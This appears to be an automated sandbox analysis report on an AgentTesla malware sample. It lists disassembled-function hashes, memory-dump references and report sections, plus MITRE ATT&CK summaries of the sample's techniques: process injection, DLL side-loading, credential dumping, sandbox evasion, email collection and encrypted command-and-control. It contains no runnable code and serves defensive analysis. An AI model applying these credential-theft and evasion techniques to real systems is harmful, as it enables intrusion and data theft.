Instruction ID: 120401aed0c240092fb7d85943b00c7af7e9106589a5ae68dffb5eaf1ab7a07b
Opcode Fuzzy Hash: d04d9cee5199b25b07f22ab044a8ff4dfd09b0d572c42733a83b04a59c95b1ee
Instruction Fuzzy Hash: 8411B6307001048BEF91667DD40672D32D3EB85614F2049ADF6C2CF69BEA25DC824BD1

Function 010F07F9 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df29a5bb714ee771dba617d27929c87f7edca5d99162f6d61c7001e8c1bb3ae9
Instruction ID: a85edcda32dd5e139405701b9e6865a2b7dd53d09a21982a76cf6382209c97c3
Opcode Fuzzy Hash: df29a5bb714ee771dba617d27929c87f7edca5d99162f6d61c7001e8c1bb3ae9
Instruction Fuzzy Hash: 4E11EB71B001118BEF91667DE81637937D2EB45314F14496EF5C1CFA8BE925C8864BC1

Function 010F1494 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe7bd04060ce33a039150484c84720f5954100400cd11c4b6498d3d0050b80c
Instruction ID: 4261d51092b250363d11eda304edea662d875cce9188e2d0af95bf706ba53a70
Opcode Fuzzy Hash: 4fe7bd04060ce33a039150484c84720f5954100400cd11c4b6498d3d0050b80c
Instruction Fuzzy Hash: C011A172E01215CFCF61EFB884922ED77E5EF58210B14047DD685E7B05EA35E8418B91

Function 0109D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4154716374.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_109d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15be1deefb8234687f1cb153b30c633e22d6eab59ebae080dde87592304b3a2c
Instruction ID: 0c39cf5e5a77fd283a14c4a315d96b4dc301e3392ff900864a4fbb1b17f30980
Opcode Fuzzy Hash: 15be1deefb8234687f1cb153b30c633e22d6eab59ebae080dde87592304b3a2c
Instruction Fuzzy Hash: E7110D75544280CFDB12CF58C9D0B15FFA2FB84314F28C6AAE8894B652C33AD44ACB62

Function 010F14A0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8524073234fd89506cd33abc134be049ad287ce08cb3f45df58564485124411
Instruction ID: 540abb5e5666dfb4216ee18cfec9538813f743931a4c649551e478166f8e0180
Opcode Fuzzy Hash: b8524073234fd89506cd33abc134be049ad287ce08cb3f45df58564485124411
Instruction Fuzzy Hash: 9001AD31A01215CFCF21EFBC84422AE7BE5AB88210B1404BDE685E7A01EA35E841CB91

Function 010FA6CA Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae5fd06e194a97590524a766a8d53f691791b5e0da06ff3db8922ce2caf3c31
Instruction ID: 7c923cf157bfb05ae7b457f7c4a0800c01c9e9fb34d09145c0463acdf784e931
Opcode Fuzzy Hash: 9ae5fd06e194a97590524a766a8d53f691791b5e0da06ff3db8922ce2caf3c31
Instruction Fuzzy Hash: 3301C431A002058BDB00EF6ADD85B8ABBB1FFC4321F94C564D94C5F296EB70D945C7A1

Function 010F8F20 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edad3dc30ab3199e0aee8d9d6d4ce4fb321ca09a8f4445279e9f16a239e672ee
Instruction ID: 7f54dd475ca7405f0012bd593c32c9f041b455b062e3916cf46af57bd40962e1
Opcode Fuzzy Hash: edad3dc30ab3199e0aee8d9d6d4ce4fb321ca09a8f4445279e9f16a239e672ee
Instruction Fuzzy Hash: 8701D6B491011A9FCF45FBB6F88078D7BF1EB44304F105768D0059B254FE326E859B82

Function 010F7EC0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0373ded54e73c15e4e5503110d78f385947bb8c15891f2746c0082f7dbadcb5
Instruction ID: 51dc97f043a831bc5d46750241f22fd659277765af1905b6e64a77fe2870725b
Opcode Fuzzy Hash: d0373ded54e73c15e4e5503110d78f385947bb8c15891f2746c0082f7dbadcb5
Instruction Fuzzy Hash: BFF0C435B001188FCB18DB74D599AAC77B2EF88315F6540A8E5069B3A4DF35AD42CB40

Function 010F8F30 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2209e9b8a583ad1b406af177888da56d89fb7306e387fbe7dc03b143a79c018
Instruction ID: 975dd2a8fe329fb2edb090ebf219a9ed0dfa44687ccbaf08463437834b2039de
Opcode Fuzzy Hash: b2209e9b8a583ad1b406af177888da56d89fb7306e387fbe7dc03b143a79c018
Instruction Fuzzy Hash: F8F0AFB090021A9FCF49FFBAF88058D7BB1EB84304F105769D0059B258FE326E858B82

Non-executed Functions

Function 05975670 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$tq, xrefs: 05975B61
$tq, xrefs: 059757D5
$tq, xrefs: 05975B6D
$tq, xrefs: 05975C0C
$tq, xrefs: 059757E1
$tq, xrefs: 05975C16
$tq, xrefs: 059757A4
$tq, xrefs: 05975C22
$tq, xrefs: 059757B0
$tq, xrefs: 05975C00

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID: $tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq
API String ID: 0-173664734
Opcode ID: 70d81726085509b6254d664468bd0adc037373130b2b5dde1848d9af9f2b302b
Instruction ID: 5917c35762304cc7cf9360e0edb3840bbb9537a021d3a34b7156eff1caf34253
Opcode Fuzzy Hash: 70d81726085509b6254d664468bd0adc037373130b2b5dde1848d9af9f2b302b
Instruction Fuzzy Hash: 52123E70B05219CFDB64DB65C894AAEB7B6FF88300F25856AD40AAB354DB309D85CF80

Function 05970308 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON

Download Yara Rule

Strings

$tq, xrefs: 05971740
$tq, xrefs: 05971770
$tq, xrefs: 05971723
$tq, xrefs: 05971717
$tq, xrefs: 05971764
$tq, xrefs: 0597174C

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID: $tq$$tq$$tq$$tq$$tq$$tq
API String ID: 0-2574395493
Opcode ID: 685214a36df6f8d30a528576fb2db7d3dc73410fc806af53284bbc3d77f64fa3
Instruction ID: 28ddf5c054ab9f574ef8b5e067b80e49911ffd147a1b10cf632f418c3b8ea9cb
Opcode Fuzzy Hash: 685214a36df6f8d30a528576fb2db7d3dc73410fc806af53284bbc3d77f64fa3
Instruction Fuzzy Hash: 0FD23C30A00219CFDB14DF69C598AADB7B6FF89310F5485AAD449AB355EB30ED85CF80

Function 0597C370 Relevance: 4.3, Strings: 3, Instructions: 574COMMON

Download Yara Rule

Strings

0oWp, xrefs: 0597C408
PHtq, xrefs: 0597C5D0
DqWp, xrefs: 0597C414

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID: 0oWp$DqWp$PHtq
API String ID: 0-1088015993
Opcode ID: 55e7e3d3f3976447474975e4f79a49864faea7246e5b54051093188e559af954
Instruction ID: a4bdbca2e01c6c1a8e738f8e2f4b5c257e9fb59ffcd7c069233e41b13904f737
Opcode Fuzzy Hash: 55e7e3d3f3976447474975e4f79a49864faea7246e5b54051093188e559af954
Instruction Fuzzy Hash: 25227070B0010A8FCB14DB79D494AAEB7F6FF89310F24896AE406DB365DB35EC418B91

Function 05973CC0 Relevance: 2.9, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

XPyq, xrefs: 05973F76
\Oyq, xrefs: 05973DE2

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID: XPyq$\Oyq
API String ID: 0-3565698988
Opcode ID: 9ebce515fb757a5aa583e684f824f2d09043622e57b1cc425bcc76e946d33dfe
Instruction ID: 93d30435268cb1cca43c5b90d3f2c5f7bdae4dbe068ef6dfec2c14a63ab6379f
Opcode Fuzzy Hash: 9ebce515fb757a5aa583e684f824f2d09043622e57b1cc425bcc76e946d33dfe
Instruction Fuzzy Hash: 04D1C231B141198FDF24DB68D494ABDBBB6FB89310F24886BE44ADB355CA31DC45CB90

Function 010FE4BD Relevance: 2.0, Instructions: 1959COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70d4ab9a97da025c38cdb1866b768fc6c7c2586a522dd12e95d759292015cf3a
Instruction ID: 5f4b76e35115c1cb9986fad020e1470589a2072292cd3ed7231ff3429fa18fe7
Opcode Fuzzy Hash: 70d4ab9a97da025c38cdb1866b768fc6c7c2586a522dd12e95d759292015cf3a
Instruction Fuzzy Hash: 45130C31D10B1A8ADB11EF68C88469DF7B1FF99300F55C79AE548A7221EB70AAC5CB41

Function 05973560 Relevance: 1.8, Strings: 1, Instructions: 598COMMON

Download Yara Rule

Strings

$, xrefs: 05973C43

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: f66fbb3aff5f2be513bf900f5074524c8b5ddc5b60173b43767dc489d9e61c2a
Instruction ID: f27ff5dfd63a078c09796b8b756da4d47be7f3050bc5398612e590148eabd42b
Opcode Fuzzy Hash: f66fbb3aff5f2be513bf900f5074524c8b5ddc5b60173b43767dc489d9e61c2a
Instruction Fuzzy Hash: 1322E271F042198FDF24DBA4C480AAEBBB6FF84310F24886AD849AB355DB35DC45DB90

Function 010F41D0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V]m, xrefs: 010F4487

Memory Dump Source

Source File: 00000001.00000002.4155124013.00000000010F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10f0000_RegAsm.jbxd

Similarity

API ID:
String ID: \V]m
API String ID: 0-4105700344
Opcode ID: bfd1567981d7336c8203ca1e5268540e6458a86e70d8ad706219c34f15eb7fbd
Instruction ID: a0f5a12c7c8a4af8c6bfa7518606e786669588a606dd596e0c6c997b19bb9ea1
Opcode Fuzzy Hash: bfd1567981d7336c8203ca1e5268540e6458a86e70d8ad706219c34f15eb7fbd
Instruction Fuzzy Hash: A1B15BB0E002098FDF54CFA9D8867EEBBF2AF88314F14812DD955E7694EB749845CB81

Function 059745C0 Relevance: .8, Instructions: 812COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4159113504.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5970000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d357c9386d9e7f152282c146fea1f21aa4d7bd3d6bf77b4dad97ae1809b79ab
Instruction ID: c4c6150f1f669d0cf940583c7fad063ba972921b45d94a9985aef76751418111
Opcode Fuzzy Hash: 2d357c9386d9e7f152282c146fea1f21aa4d7bd3d6bf77b4dad97ae1809b79ab
Instruction Fuzzy Hash: A7626C34B002098FDF14DB69D594AADBBF6FF88310F14856AE50AAB355DB35ED42CB80

Function 067FA198 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d1fbe9e95cf45bb759c616d6022f9a3ec85fd5676a4de2d4068f82d4f97d77d
Instruction ID: 6c81b44573b0cedeb1167381515a33c0d775f84aea5606ac578c1c1839ff337f
Opcode Fuzzy Hash: 2d1fbe9e95cf45bb759c616d6022f9a3ec85fd5676a4de2d4068f82d4f97d77d
Instruction Fuzzy Hash: 51A16032E10209CFCF45DFB5C8449AEB7B2FF84310B15856AEA19AB311DB76E945CB80

Function 067FBC48 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4160093257.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_67f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15521115744e1700f4061fb9d51c20a73d7d1a2f92149867c374c9774e54e1b9
Instruction ID: becb6c81ac1031b511cd3531f7380626dc8bd852a52ec262b1a4b8b00a776fb8
Opcode Fuzzy Hash: 15521115744e1700f4061fb9d51c20a73d7d1a2f92149867c374c9774e54e1b9
Instruction Fuzzy Hash: 77C1C0B1A316468AE714CF65F85E18D7FB1BF85328B605309E2612F2E1DFB8149ACF44

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VYLigyTDuW.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Networking

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
VYLigyTDuW.exe

Function 022A2DA5 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 369
nativethreadprocessCOMMON

Function 022A2D84 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 361
nativeCOMMON

Function 0054AA9F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
nativememoryCOMMON

Function 0054B868 Relevance: 194.9, APIs: 108, Strings: 3, Instructions: 691
librarymemoryloaderCOMMON

Function 0054D027 Relevance: 155.5, APIs: 103, Instructions: 974
COMMON

Function 005C75A5 Relevance: 125.0, APIs: 70, Strings: 1, Instructions: 747
COMMON

Function 0054F0C9 Relevance: 105.4, APIs: 59, Strings: 1, Instructions: 441
memoryCOMMON

Function 0054F786 Relevance: 100.2, APIs: 56, Strings: 1, Instructions: 453
memoryCOMMON

Function 0054E01F Relevance: 66.9, APIs: 37, Strings: 1, Instructions: 361
COMMON

Function 0054DD50 Relevance: 39.2, APIs: 26, Instructions: 206
COMMON

Function 0054C231 Relevance: 33.2, APIs: 22, Instructions: 178
COMMON

Function 0054CB74 Relevance: 25.6, APIs: 17, Instructions: 138
memoryCOMMON

Function 005C7404 Relevance: 15.1, APIs: 10, Instructions: 114
COMMON

Function 005C738D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
COMMON

Function 0054B24F Relevance: 4.5, APIs: 3, Instructions: 44
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre